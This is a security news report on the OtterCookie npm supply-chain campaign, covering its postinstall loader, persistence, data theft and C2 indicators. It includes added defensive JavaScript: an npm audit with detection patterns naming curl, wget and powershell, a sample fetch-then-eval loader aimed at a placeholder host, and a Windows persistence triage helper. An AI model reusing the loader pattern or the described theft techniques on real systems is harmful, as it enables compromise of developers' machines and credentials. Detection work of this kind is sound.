North Korean Hackers Exploiting npm, GitHub, and Vercel to Deliver OtterCookie Malware

A major security threat has emerged targeting software developers worldwide. North Korean state-sponsored threat actors, operating under the “Contagious Interview” campaign, are systematically spreading malicious packages across npm, GitHub, and Vercel infrastructure to deliver OtterCookie malware.

This sophisticated multi-stage operation demonstrates how threat actors have adapted their tools to target modern JavaScript and Web3 development workflows.

Since October 10, 2025, researchers have uncovered at least 197 new malicious npm packages designed to trick developers into installing compromised code, with over 31,000 additional downloads recorded during this wave alone.

The attack chain works through a carefully coordinated supply chain approach. Threat actors create fake developer portfolios on GitHub, publish typosquatted packages on npm that impersonate legitimate libraries, and use Vercel hosting to stage the malware payloads.

When developers unknowingly install these malicious packages, a postinstall script automatically executes and reaches out to attacker-controlled endpoints to fetch and run the latest OtterCookie variant.

This seamless integration into standard development workflows makes the attack particularly dangerous: it sidesteps ordinary security awareness, because developers expect npm packages to execute code during installation.

Socket.dev security analysts identified the infrastructure behind this campaign and found that it reveals a well-orchestrated operation.

The researchers traced malicious packages like “tailwind-magic,” which impersonates the legitimate “tailwind-merge” library, to a threat actor-controlled GitHub account named “stardev0914” and a Vercel staging endpoint called “tetrismic.vercel.app.”

Contagious Interview attack chain (Source - Socket.dev)

This account contained at least 18 repositories designed to serve as both delivery vehicles and convincing lures, with repositories themed around cryptocurrency projects including fake DEX front-ends and token sites.

At least five core malicious packages, including “node-tailwind,” “tailwind-node,” and “react-modal-select,” route through this infrastructure.

The malware architecture itself reflects sophisticated development. OtterCookie operates as a combined infostealer and remote access trojan with cross-platform capabilities spanning Windows, macOS, and Linux.

Once executed within a Node.js process, the malware performs initial environment checks to detect virtual machines and sandboxes, fingerprints the infected host, and then establishes bidirectional communication with command and control servers.

This detection-evasion approach ensures the malware only fully activates on legitimate developer machines rather than analyst environments where security researchers typically operate.

Infection and Persistence Mechanisms

The infection mechanism demonstrates meticulous engineering. The malicious npm packages use a postinstall script that executes when developers run npm install.

This script calls the threat actor endpoint at https://tetrismic.vercel.app/api/ipcheck using axios, which returns JavaScript code embedded in a JSON field named “model.”

Annotated GitHub view of the threat actor-controlled account stardev0914 (Source - Socket.dev)

The package then extracts this field and executes it with eval inside the victim’s Node.js process, granting the attackers full Node.js privileges and allowing arbitrary code execution.

The staging server continuously updates its main.js payload, enabling threat actors to rotate malware variants across multiple packages and customize responses per target.
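A defender-side check for the install-hook pattern described above, added here as an example and not code from the article or from Socket.dev: it audits a package manifest for install-time lifecycle hooks and scans the file the hook runs for a remote fetch paired with eval() or new Function(). The package names, manifests and loader text are constructed samples (the host is a reserved .invalid name that never resolves), and the indicator lists are my own assumptions rather than a published signature.

```javascript
// Added example (not the article's or Socket.dev's code): a pre-install audit
// for npm packages. It flags install-time lifecycle hooks in package.json and
// loader code that fetches remote content and hands it to eval()/new Function(),
// the pattern the article attributes to the OtterCookie loader. All package
// names, manifests and source text below are constructed samples; the indicator
// lists are my own assumptions, not a published signature.

// Lifecycle hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Shell-level red flags inside a hook command.
const SCRIPT_INDICATORS = [
  /\bnode\s+(-e|--eval)\b/i, // inline JavaScript passed on the command line
  /\b(curl|wget)\b/i,        // downloading something at install time
  /\bpowershell\b/i,
  /\bbase64\b/i,
];

// Source-level indicators: a remote fetch paired with dynamic execution.
const FETCH_PATTERNS = [
  /\baxios\s*\.\s*(get|post)\b/,
  /\bfetch\s*\(/,
  /\bhttps?\s*\.\s*(get|request)\s*\(/,
];
const EXEC_PATTERNS = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /\bvm\s*\.\s*run[A-Za-z]*\s*\(/,
];

// Return one finding per install-time hook declared in a parsed package.json.
// Every hook is worth a look; shell indicators raise the severity.
function auditManifest(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const indicators = SCRIPT_INDICATORS.filter((re) => re.test(command)).map(String);
    findings.push({
      package: pkg.name,
      hook,
      command,
      severity: indicators.length ? "high" : "review",
      indicators,
    });
  }
  return findings;
}

// Report whether a JavaScript source both fetches remote content and executes
// code dynamically; the matched patterns tell a reviewer where to look.
function auditSource(src) {
  const remoteFetch = FETCH_PATTERNS.filter((re) => re.test(src)).map(String);
  const dynamicExec = EXEC_PATTERNS.filter((re) => re.test(src)).map(String);
  return { remoteFetch, dynamicExec, suspicious: remoteFetch.length > 0 && dynamicExec.length > 0 };
}

// Combine both checks for one package: suspicious when it declares an install
// hook and the file that hook runs fetches-then-evals.
function auditPackage(pkg, hookedSource) {
  const manifest = auditManifest(pkg);
  const source = auditSource(hookedSource || "");
  return { manifest, source, suspicious: manifest.length > 0 && source.suspicious };
}

// Constructed sample: a manifest with a postinstall hook whose target file
// fetches JSON from a reserved, non-resolving .invalid host and evaluates
// one field of the response.
const SAMPLE_PKG = {
  name: "example-typosquat",
  version: "1.0.0",
  scripts: { postinstall: "node ./lib/setup.js" },
};
const SAMPLE_LOADER = `
const axios = require("axios");
axios.get("https://staging.example.invalid/api/check").then((r) => eval(r.data.model));
`;

// Constructed benign control: a build step only, no dynamic execution.
const BENIGN_PKG = { name: "example-clean", version: "2.0.0", scripts: { build: "tsc -p ." } };
const BENIGN_SOURCE = "module.exports = (a, b) => a + b;";

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_LOADER), null, 2));
console.log(JSON.stringify(auditPackage(BENIGN_PKG, BENIGN_SOURCE), null, 2));
```

On a real checkout the same functions would be fed each node_modules/*/package.json together with the file its hook points at; a hook that runs an innocuous-looking local file is exactly the shape the article describes, so "review" findings deserve a look even without shell indicators. Independently of any scanner, npm's ignore-scripts setting (npm install --ignore-scripts, or ignore-scripts=true in .npmrc) stops lifecycle scripts from running at all, which removes this initial-execution step outright; packages that genuinely need a build hook then have to be allowed explicitly.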

Once deployed, OtterCookie establishes persistence through multiple mechanisms. On Windows systems, the malware creates scheduled tasks named “NodeUpdate” that run at logon with highest privileges, and adds a registry autorun entry, HKCU\…\Run\NodeHelper.

The actual payload spawns three asynchronous worker processes using child_process.spawn, each running as a detached Node.js process with stdio set to “ignore” and the windowsHide option set to true.

These processes then unref themselves, allowing them to continue running in the background after the initial loader exits.
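A host-triage helper for the persistence artifacts just described, added here as an example and not code from the article or from Socket.dev: it parses the text printed by reg query and by schtasks /query /fo CSV /v and flags autorun entries whose command launches Node.js from a user-writable directory. The two command outputs in the block are constructed samples in those tools' formats (the schtasks sample keeps only a few of its real columns), the task and value names mirror the article, and the path heuristics are my own assumptions rather than a published detection rule.

```javascript
// Added example (not the article's or Socket.dev's code): a host-triage helper
// for the persistence artifacts described above. It parses the text printed by
//   reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
//   schtasks /query /fo CSV /v
// and flags autorun entries whose command launches Node.js from a user-writable
// directory. The two outputs below are constructed samples in those tools'
// formats (the schtasks sample keeps only a few of its real columns); the task
// and value names mirror the article, and the path heuristics are my own
// assumptions, not a published detection rule.

// A command that invokes node / node.exe directly.
const NODE_LAUNCH = /(^|[\s"\\])node(\.exe)?["\s]/i;
// Script or binary located somewhere a non-admin user can write.
const USER_WRITABLE = /\\(Users\\[^\\]+\\AppData|Users\\[^\\]+\\Downloads|Temp|ProgramData)\\/i;

// Parse `reg query ...\Run` output into {name, type, data} rows.
// Value lines look like:  <name>    REG_SZ    <data>
function parseRegRun(text) {
  const rows = [];
  for (const raw of text.split(/\r?\n/)) {
    const m = raw.trim().match(/^(\S.*?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$/);
    if (m) rows.push({ name: m[1], type: m[2], data: m[3] });
  }
  return rows;
}

// Parse `schtasks /query /fo CSV /v` output into objects keyed by column name.
function parseSchtasksCsv(text) {
  const lines = text.split(/\r?\n/).map((l) => l.trim()).filter(Boolean);
  if (!lines.length) return [];
  const split = (l) => l.replace(/^"|"$/g, "").split(/","/);
  const header = split(lines[0]);
  return lines
    .slice(1)
    .filter((l) => l !== lines[0]) // /v repeats the header row per task folder
    .map((l) => {
      const cells = split(l);
      return Object.fromEntries(header.map((h, i) => [h, cells[i] ?? ""]));
    });
}

// True when the command starts node and the referenced path is user-writable.
function launchesNodeFromUserPath(command) {
  return NODE_LAUNCH.test(command) && USER_WRITABLE.test(command);
}

// Run-key values that start node from a user-writable path.
function suspiciousRunValues(regText) {
  return parseRegRun(regText)
    .filter((r) => launchesNodeFromUserPath(r.data))
    .map((r) => ({ source: "HKCU\\...\\Run", name: r.name, command: r.data }));
}

// Scheduled tasks that start node from a user-writable path; trigger and
// principal are kept because "at logon, highest privileges" is the shape to look for.
function suspiciousTasks(csvText) {
  return parseSchtasksCsv(csvText)
    .filter((t) => launchesNodeFromUserPath(t["Task To Run"] || ""))
    .map((t) => ({
      source: "schtasks",
      name: (t.TaskName || "").replace(/^\\/, ""),
      command: t["Task To Run"],
      trigger: t["Schedule Type"],
      runAs: t["Run As User"],
    }));
}

function triageHost(regText, csvText) {
  return [...suspiciousRunValues(regText), ...suspiciousTasks(csvText)];
}

// Constructed sample outputs: one benign and one suspicious entry each.
const SAMPLE_REG = String.raw`
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\dev\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    NodeHelper    REG_SZ    node C:\Users\dev\AppData\Roaming\NodeHelper\main.js
`;
const SAMPLE_SCHTASKS = String.raw`
"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type"
"DEV-PC","\OneDrive Standalone Update Task","Ready","Microsoft","%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","dev","Daily"
"DEV-PC","\NodeUpdate","Ready","DEV-PC\dev","node C:\Users\dev\AppData\Roaming\NodeHelper\main.js","dev","At logon time"
`;

console.log(JSON.stringify(triageHost(SAMPLE_REG, SAMPLE_SCHTASKS), null, 2));
```

The output is a review list, not a verdict: a developer tool that legitimately runs a script from AppData will appear too, which is why the command line, trigger and principal are carried into each finding. The same path heuristic can be applied to process-creation telemetry, where the article's three detached workers would show up as node.exe children of an npm or node parent with a hidden window.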

KXCO-branded DEX front end hosted at knightsbridge-dex[.]vercel[.]app (Source - Socket.dev)

The malware simultaneously performs system-wide keylogging using the GlobalKeyboardListener module, captures screenshots from all connected monitors every 5 seconds, exfiltrates clipboard contents, and recursively scans the filesystem for files matching patterns like “.env,” “metamask,” “phantom,” and “seed” to harvest cryptocurrency wallet data and credentials.

The comprehensive data harvesting capabilities extend to browser profiles. The malware specifically targets Chrome and Brave browsers on all three operating systems, accessing stored login credentials by querying the “Login Data” SQLite database found in each browser’s profile directory.

Additionally, it identifies and extracts data from at least 42 different cryptocurrency wallet browser extensions, including MetaMask, Phantom, Keplr, and dozens of others commonly used by Web3 developers.

All collected data flows through the command and control infrastructure at IP address 144.172.104.117, which handles both data collection and tasking, allowing threat actors to issue remote commands and maintain persistent interactive shell access.
